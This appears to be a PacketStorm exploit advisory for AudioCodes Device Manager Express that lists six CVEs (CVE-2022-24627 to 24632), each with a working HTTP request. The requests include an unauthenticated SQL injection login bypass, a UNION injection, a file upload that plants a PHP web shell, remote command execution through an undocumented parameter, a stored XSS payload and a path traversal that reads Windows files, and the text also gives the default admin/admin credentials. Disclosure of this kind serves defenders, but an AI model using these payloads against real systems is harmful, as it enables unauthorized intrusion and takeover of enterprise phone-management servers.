Share
## https://sploitus.com/exploit?id=PACKETSTORM:171109
# Product Name: Device Manager Express  
# Vendor Homepage: https://www.audiocodes.com  
# Software Link:  
https://www.audiocodes.com/solutions-products/products/management-products-solutions/device-manager  
# Version: <= 7.8.20002.47752  
# Tested on: Windows 10 / Server 2019  
# Default credentials: admin/admin  
# CVE-2022-24627, CVE-2022-24628, CVE-2022-24629, CVE-2022-24630,  
CVE-2022-24631, CVE-2022-24632  
# Exploit: https://github.com/00xEF/Audiocodes-Device-Manager-Express  
  
AudioCodes' Device Manager Express features a user interface that enables  
enterprise network administrators to set up, configure and update up to 500  
400HD Series IP phones in globally distributed corporations.  
  
----------------  
CVE-2022-24627: An unauthenticated SQL injection exists in the p parameter  
of the login form.  
----------------  
POST /admin/AudioCodes_files/process_login.php HTTP/1.1  
Host: 10.11.12.13  
".." omitted  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)  
Content-Type: application/x-www-form-urlencoded  
  
username=admin&password=&domain=&p=%5C%27or+1%3D1%23  
  
  
----------------  
CVE-2022-24628: An authenticated SQL injection exists in the id parameter  
of IPPhoneFirmwareEdit.php  
----------------  
/admin/AudioCodes_files/IPPhoneFirmwareEdit.php?action=download&id=-1338'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-  
  
  
----------------  
CVE-2022-24629: A remote code execution vulnerability exists via path  
traversal in the dir parameter of the file upload functionality .  
----------------  
POST /admin/AudioCodes_files/BrowseFiles.php?type= HTTP/1.1  
Host: 10.11.12.13  
".." omitted  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)  
  
-----------------------------119140522224988540294045582807  
Content-Disposition: form-data; name="dir"  
  
C:/audiocodes/express/WebAdmin/admin/AudioCodes_files/ajax/  
-----------------------------119140522224988540294045582807  
Content-Disposition: form-data; name="type"  
  
-----------------------------119140522224988540294045582807  
Content-Disposition: form-data; name="myfile"; filename="ajaxJabra.php"  
Content-Type: application/x-php  
  
<?php echo shell_exec($_GET['x']); ?>  
  
  
-----------------------------119140522224988540294045582807  
Content-Disposition: form-data; name="Submit"  
  
Upload  
-----------------------------119140522224988540294045582807--  
  
  
----------------  
CVE-2022-24630: A remote command execution exists in an undocumented eval  
function in BrowseFiles.php  
----------------  
POST /admin/AudioCodes_files/BrowseFiles.php?cmd=ssh HTTP/1.1  
Host: 10.11.12.13  
".." omitted  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)  
  
ssh_command=dir+C:  
  
  
----------------  
CVE-2022-24631: A Persistent Cross-Site Scripting exists in the desc  
parameter in ajaxTenants.php  
----------------  
POST /admin/AudioCodes_files/ajax/ajaxTenants.php HTTP/1.1  
Host: 10.11.12.13  
".." omitted  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)  
  
action=save&id=1&name=Default&desc=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&subnet=&isdefault=true  
  
  
----------------  
CVE-2022-24632: A path traversal vulnerability exists in the view parameter  
of the file download functionality in BrowseFiles.php  
----------------  
/admin/AudioCodes_files/BrowseFiles.php?view=C:/windows/win.ini